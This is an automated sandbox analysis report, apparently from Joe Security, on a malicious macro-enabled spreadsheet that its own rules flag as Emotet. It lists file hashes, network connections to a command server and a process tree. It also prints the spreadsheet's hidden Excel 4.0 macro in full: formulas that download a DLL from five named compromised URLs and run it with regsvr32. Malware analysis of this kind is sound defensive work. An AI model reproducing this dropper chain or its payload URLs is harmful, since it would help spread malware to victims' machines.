                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1536
                                                                                                              Entropy (8bit):1.1464700112623651
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                              MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                              SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                              SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                              SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                              Malicious:false
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                              Category:dropped
                                                                                                              Size (bytes):61414
                                                                                                              Entropy (8bit):7.995245868798237
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                              MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                              SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                              SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                              SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                              Malicious:false
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):161595
                                                                                                              Entropy (8bit):6.302448239972517
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
                                                                                                              MD5:D99661D0893A52A0700B8AE68457351A
                                                                                                              SHA1:01491FD23C4813A602D48988531EA4ABBCDF7ED9
                                                                                                              SHA-256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
                                                                                                              SHA-512:6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                              Malicious:true
                                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):679936
                                                                                                              Entropy (8bit):6.910563837671393
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
                                                                                                              MD5:9B303820618ADC4A4828E9E689F73562
                                                                                                              SHA1:64F1453A3E556F6625251D4460EC035257A4E25F
                                                                                                              SHA-256:AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
                                                                                                              SHA-512:35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
                                                                                                              Malicious:true
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):679936
                                                                                                              Entropy (8bit):6.910563837671393
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:Z6ZLutvgrwV8RQc5W1yS0ezL9J6XKTe/vyzfANcN/kJhXx5y:qza8RQc5W1P0Q9sXKTLzflBkn
                                                                                                              MD5:9B303820618ADC4A4828E9E689F73562
                                                                                                              SHA1:64F1453A3E556F6625251D4460EC035257A4E25F
                                                                                                              SHA-256:AB3BC9CFB110ECD8DA508576F02C22947A008FBB28CE1C4C46741044BF359C8B
                                                                                                              SHA-512:35612714A9C29879848E7C6F2D82713EB1F68BE5D7A22449E1560E95A6E002A600873D8C867E6A617F9D40E427273458E2948EAFE8B59C2D1C2E51A572EAE15A
                                                                                                              Malicious:false
                                                                                                              File type:Microsoft Excel 2007+
                                                                                                              Entropy (8bit):7.50230113901236
                                                                                                              TrID:
                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                              • ZIP compressed archive (8000/1) 8.08%
                                                                                                              File name:Documento.xlsm
                                                                                                              File size:214313
                                                                                                              MD5:5acc6f1ff8366ddc895392da4e6a50e3
                                                                                                              SHA1:45b3ef65a4dabdbbefec603fe3dca9bfb1c5c643
                                                                                                              SHA256:0bb184f9c3e9cda4571bd806b90dbda484c331d9dce7af784405fd211f6c71c4
                                                                                                              SHA512:dc1921d8e4c2a2496d1d44f4079e1518015aec4854eed6f7759136bc42b21e39305efc5285a9dd1ab846a73a6dbd04faa60489d0bfc38e00f416fd0ff443dc70
                                                                                                              SSDEEP:6144:CMyysPlevgOrNeduXWNOYYYYYYYYYYYYYYYYYYYYYY1:RyrPU4xduGO
                                                                                                              Icon Hash:e4e2aa8aa4bcbcac
                                                                                                              Document Type:OpenXML
                                                                                                              Number of OLE Files:1
                                                                                                              Has Summary Info:
                                                                                                              Application Name:
                                                                                                              Encrypted Document:
                                                                                                              Contains Word Document Stream:
                                                                                                              Contains Workbook/Book Stream:
                                                                                                              Contains PowerPoint Document Stream:
                                                                                                              Contains Visio Document Stream:
                                                                                                              Contains ObjectPool Stream:
                                                                                                              Flash Objects Count:
                                                                                                              Contains VBA Macros:
                                                                                                              Name:Br1
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
Br1 | 3 | False | 0 | False | pre
14,2,=CHAR("101")
                                                                                                              Name:Br2
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
Br2 | 3 | False | 0 | False | pre
2,1,e
                                                                                                              Name:Br2
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
Br2 | 3 | False | 0 | False | post
2,1,e
                                                                                                              Name:EFWFSFG
                                                                                                              Type:4
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
EFWFSFG | 4 | False | 0 | False | post
10,3,=FORMULA("e";"e")
=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.swaong.com/assets/VV4/","..\xxw1.ocx",0,0)";D15)
=FORMULA("=IF(DDWD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/","..\xxw1.ocx",0,0))";D17)
=FORMULA("=IF(DDWD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://old.liceum9.ru/images/images/NKeRl/","..\xxw1.ocx",0,0))";D19)
=FORMULA("=IF(DDWD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://arttop100.cn/wp-admin/DvyJPADMPW/","..\xxw1.ocx",0,0))";D21)
=FORMULA("=IF(DDWD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,,0,"2&"..\xxw1.ocx",0,0))";D23)
=FORMULA("=IF(DDWD4<0, CLOSE(0),)";D25)
=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")";D27)
=FORMULA("=RETURN()";D36)
14,3,=CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"https://www.swaong.com/assets/VV4/";"..\xxw1.ocx";0;0)
16,3,=IF(DDWD<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/";"..\xxw1.ocx";0;0))
18,3,=IF(DDWD1<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://old.liceum9.ru/images/images/NKeRl/";"..\xxw1.ocx";0;0))
20,3,=IF(DDWD2<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://arttop100.cn/wp-admin/DvyJPADMPW/";"..\xxw1.ocx";0;0))
22,3,=IF(DDWD3<0; CALL("urlmon";"URLDownloadToFileA";"JJCCBB";0;"http://peterjacksoncars.com.au/wp-content/sJ/";"..\xxw1.ocx";0;0))
24,3,=IF(DDWD4<0; CLOSE(0);)
26,3,=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")
35,3,=RETURN()
                                                                                                              Name:EFWFSFG
                                                                                                              Type:4
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
EFWFSFG | 4 | False | 0 | False | pre
10,3,=FORMULA("e";"e")
=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.swaong.com/assets/VV4/","..\xxw1.ocx",0,0)";D15)
=FORMULA("=IF(DDWD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/7uAnLq8I/","..\xxw1.ocx",0,0))";D17)
=FORMULA("=IF(DDWD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://old.liceum9.ru/images/images/NKeRl/","..\xxw1.ocx",0,0))";D19)
=FORMULA("=IF(DDWD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://arttop100.cn/wp-admin/DvyJPADMPW/","..\xxw1.ocx",0,0))";D21)
=FORMULA("=IF(DDWD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,,0,"2&"..\xxw1.ocx",0,0))";D23)
=FORMULA("=IF(DDWD4<0, CLOSE(0),)";D25)
=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")";D27)
=FORMULA("=RETURN()";D36)
                                                                                                              Name:Br1
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
Br1 | 3 | False | 0 | False | post
14,2,=CHAR("101")
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 24, 2022 13:54:42.410712957 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:42.513951063 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:42.514071941 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:42.617535114 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:42.722239971 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:42.754889011 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:42.754951954 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:42.755040884 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:42.758781910 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:42.775898933 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:42.891010046 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:42.891130924 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:46.432123899 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:46.575891018 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:46.977751017 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:46.977863073 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:49.976819038 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:49.976846933 CET | 8080 | 49168 | 135.148.121.246 | 192.168.2.22
Feb 24, 2022 13:54:49.976926088 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Feb 24, 2022 13:54:49.976963043 CET | 49168 | 8080 | 192.168.2.22 | 135.148.121.246
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 24, 2022 13:54:08.191229105 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 24, 2022 13:54:08.191229105 CET | 192.168.2.22 | 8.8.8.8 | 0xaa77 | Standard query (0) | www.swaong.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 24, 2022 13:54:08.260437012 CET | 8.8.8.8 | 192.168.2.22 | 0xaa77 | No error (0) | www.swaong.com | swaong-home.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2022 13:54:08.260437012 CET | 8.8.8.8 | 192.168.2.22 | 0xaa77 | No error (0) | swaong-home.azurewebsites.net | waws-prod-dm1-143.sip.azurewebsites.windows.net | | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2022 13:54:08.260437012 CET | 8.8.8.8 | 192.168.2.22 | 0xaa77 | No error (0) | waws-prod-dm1-143.sip.azurewebsites.windows.net | waws-prod-dm1-143.cloudapp.net | | CNAME (Canonical name) | IN (0x0001)


                                                                                                              Target ID:0
                                                                                                              Start time:13:53:18
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                              Imagebase:0x13f170000
                                                                                                              File size:28253536 bytes
                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Target ID:3
                                                                                                              Start time:13:53:29
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:4
                                                                                                              Start time:13:53:31
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:5
                                                                                                              Start time:13:53:35
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:6
                                                                                                              Start time:13:53:39
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:7
                                                                                                              Start time:13:53:41
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:8
                                                                                                              Start time:13:53:43
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:9
                                                                                                              Start time:13:53:46
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:10
                                                                                                              Start time:13:53:49
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:11
                                                                                                              Start time:13:53:53
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.8%
                                                                                                                Dynamic/Decrypted Code Coverage:42.4%
                                                                                                                Signature Coverage:34.7%
                                                                                                                Total number of Nodes:568
                                                                                                                Total number of Limit Nodes:26
calls 45060->45062 45061->45046 45062->45059 45141 1003d578 45063->45141 45065 10048424 GetStartupInfoA 45066 10046749 __calloc_crt 69 API calls 45065->45066 45074 10048445 45066->45074 45067 1004864f ___crtInitCritSecAndSpinCount 45067->44952 45068 100485cc GetStdHandle 45073 10048596 45068->45073 45069 10046749 __calloc_crt 69 API calls 45069->45074 45070 10048631 SetHandleCount 45070->45067 45071 100485de GetFileType 45071->45073 45072 10048519 45072->45073 45076 10048542 GetFileType 45072->45076 45077 1004854d 45072->45077 45073->45068 45073->45070 45073->45071 45079 100485f5 45073->45079 45074->45067 45074->45069 45074->45072 45074->45073 45076->45072 45076->45077 45077->45067 45077->45072 45142 1004a088 69 API calls 4 library calls 45077->45142 45079->45067 45079->45073 45143 1004a088 69 API calls 4 library calls 45079->45143 45144 10040d3f 45080->45144 45082 10040e29 45082->44923 45083->44942 45084->44938 45085->44957 45086->44961 45087->44958 45088->44962 45089->44931 45090->44935 45091->44942 45092->44925 45095 1004674d 45093->45095 45096 1003d05b 45095->45096 45097 1004676d Sleep 45095->45097 45164 1003c6e3 45095->45164 45096->44942 45099 100428e5 TlsGetValue 45096->45099 45098 10046782 45097->45098 45098->45095 45098->45096 45100 100428f8 45099->45100 45101 10042919 GetModuleHandleA 45099->45101 45100->45101 45102 10042902 TlsGetValue 45100->45102 45103 1003d079 45101->45103 45104 10042928 GetProcAddress 45101->45104 45106 1004290d 45102->45106 45103->44944 45103->44945 45105 10042911 45104->45105 45105->45103 45107 10042938 RtlDecodePointer 45105->45107 45106->45101 45106->45105 45107->45103 45108->44950 45111 1003b5a9 ___crtInitCritSecAndSpinCount 45109->45111 45110 1003b622 ___crtInitCritSecAndSpinCount _realloc 45110->44942 45111->45110 45112 1003b5e8 45111->45112 45183 1004329e 69 API calls 2 library calls 45111->45183 45112->45110 45113 1003b5fd HeapFree 45112->45113 45113->45110 45115 1003b60f 45113->45115 45186 1003d47e 69 API calls 
__getptd_noexit 45115->45186 45117 1003b614 GetLastError 45117->45110 45118 1003b5c0 ___sbh_find_block 45121 1003b5da 45118->45121 45184 10043342 VirtualFree VirtualFree HeapFree __VEC_memcpy __fptostr 45118->45184 45185 1003b5f3 LeaveCriticalSection _doexit 45121->45185 45122->44942 45123->44998 45124->45002 45125->45009 45126->45015 45128 1004288c 45127->45128 45129 100428ad GetModuleHandleA 45127->45129 45128->45129 45132 10042896 TlsGetValue 45128->45132 45130 100428d6 45129->45130 45131 100428bc GetProcAddress 45129->45131 45130->45018 45133 100428a5 45131->45133 45134 100428a1 45132->45134 45133->45130 45135 100428cc RtlEncodePointer 45133->45135 45134->45129 45134->45133 45135->45130 45136->45025 45137->45036 45138->45011 45139->45055 45140->45054 45141->45065 45142->45077 45143->45079 45145 10040d4b ___crtInitCritSecAndSpinCount 45144->45145 45160 1004329e 69 API calls 2 library calls 45145->45160 45147 10040d52 45148 10040d8e _doexit 45147->45148 45150 100428e5 __decode_pointer 5 API calls 45147->45150 45161 10040df8 LeaveCriticalSection _doexit 45148->45161 45152 10040d81 45150->45152 45151 10040dd9 45153 10040ddf 45151->45153 45156 10040e07 ___crtInitCritSecAndSpinCount 45151->45156 45154 100428e5 __decode_pointer 5 API calls 45152->45154 45162 100431c6 LeaveCriticalSection 45153->45162 45154->45148 45156->45082 45157 10040dec 45163 10040bdb GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 45157->45163 45160->45147 45161->45151 45162->45157 45165 1003c6ef ___crtInitCritSecAndSpinCount 45164->45165 45166 1003c707 45165->45166 45176 1003c726 _memset 45165->45176 45177 1003d47e 69 API calls __getptd_noexit 45166->45177 45168 1003c70c 45178 10041bcb 5 API calls 2 library calls 45168->45178 45169 1003c798 RtlAllocateHeap 45169->45176 45173 1003c71c ___crtInitCritSecAndSpinCount 45173->45095 45176->45169 45176->45173 45179 1004329e 69 API calls 2 library calls 45176->45179 45180 10043aeb 5 API calls 2 library calls 45176->45180 45181 1003c7df 
